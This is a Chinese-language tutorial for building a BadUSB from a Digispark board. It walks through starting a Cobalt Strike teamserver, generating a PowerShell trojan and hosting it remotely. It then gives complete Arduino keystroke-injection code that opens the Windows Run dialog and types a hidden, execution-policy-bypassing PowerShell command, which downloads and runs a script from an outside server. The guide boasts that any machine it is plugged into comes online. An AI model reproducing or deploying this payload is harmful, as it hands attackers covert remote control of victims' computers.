使用digispark制作一個BadUSB

0X00、工具准備

digispark開發板。

淘寶連接：https://m.tb.cn/h.VK7vwjy?sm=d85844

0X01、安裝Arduino IDE環境

1、安裝 arduino 的 IDE。

 

 

 

下載地址：https://www.arduino.cc/en/Main/Software

新版下載：https://downloads.arduino.cc/arduino-1.8.3-windows.zip

 

 

2、下載驅動

鏈接：http://pan.baidu.com/s/1i4K10dn 密碼：ilaf

3、驅動安裝

如果是 64 位操作系統請選擇 DPinst64.exe，否則請選擇 DPinst.exe.

 

4、配置環境

點擊文件--首選項

附加開發板管理器網址：http://digistump.com/package_digistump_index.json

 

點擊工具--開發板管理器

等待下載完成，下載可能需要掛國外代理。

找到這個進行安裝

安裝完成后開發板選擇這個

0X02、使用CobaltStrike生成木馬

1、啟動CS

服務器：

通過screen啟動cs服務端

screen 
./teamserver 129.204.113.202 admin888

ctrl + a+d 將當前程序放到后台。

客戶端啟動

java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

客戶端連接

 

2、生成木馬

配置監聽器：

使用CS生成powershell的腳本。

 

保存到桌面

3、放到遠程服務器備用

將腳本上傳到HTTP服務器備用

0X03、BadUsb制作

代碼如下：

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}
void loop() {
}

功能是下載打開windwos+r 運行窗口，輸入命令執行。

點擊上傳，在60s之內插入你的badusb。

上傳成功。

插哪哪上線！

0X04、參考鏈接

https://mp.weixin.qq.com/s/3lkdXK_g-_xcf378FNly1A

https://mp.weixin.qq.com/s/UROx1fJOmMVbmH_-UasFEQ